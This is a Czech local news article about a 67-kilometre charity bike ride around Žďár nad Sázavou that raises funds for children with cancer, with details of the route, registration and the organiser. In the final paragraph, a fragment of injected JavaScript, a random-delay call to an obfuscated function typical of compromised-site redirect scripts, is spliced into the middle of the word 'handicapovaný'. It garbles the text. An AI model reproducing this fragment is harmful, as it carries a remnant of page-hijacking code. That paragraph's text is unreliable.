Rainbow page separator

Výtěžek tradiční cyklojízdy podpoří onkologicky nemocné děti

Úterý, 3. Srpen 2021

Žďár nad Sázavou / Sedmý ročník charitativní cyklojízdy Na kole dětem Žďárskými vrchy odstartuje v sobotu 14. srpna v půl desáté dopoledne od žďárské Pilské nádrže. Účastníci se vydají na 67 kilometrů dlouhou vyjížďku ve směru Světnov – Herálec – Svratka – Křižánky – Milovy – Sněžné – Kadov – Fryšava – Tři Studně – Vlachovice – Nové Město na Moravě – Petrovice – Slavkovice – Veselíčko a zpět do Žďáru. Zastávky opět budou ve Svratce, Sněžném a v Novém Městě na Moravě. Podle pravidel akce však není nutné absolvovat celou trasu – je možné se připojit kdekoliv po cestě a symbolicky ujet třeba jenom několik kilometrů.
Registrace u startu potrvá od osmi hodin do čtvrt na deset – kromě zaplacení dobrovolného startovného si mohou lidé zakoupit i propagační předměty v podobě triček, ponožek či náramků. Kapacita cyklojízdy byla stejně jako loni omezena na 250 zaregistrovaných cyklistů, což je možné učinit prostřednicím webu www.zdaracidetem.cz, kde je i jmenný seznam dosud zaregistrovaných jezdců. Všichni účastníci akce jsou povinni dodržovat pravidla stanovená proti šíření onemocnění COVID-19.
Charitativní podnik zaštiťuje Aleš Wasserbauer, handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapovaný cyklista, kterému byla před léty amputována noha během léčby rakoviny. Jeho projekt Na kole dětem Žďárskými vrchy získává finance pro nadační fond Krtek a pro dětská oddělení nemocnic v Novém Městě na Moravě a v Jihlavě.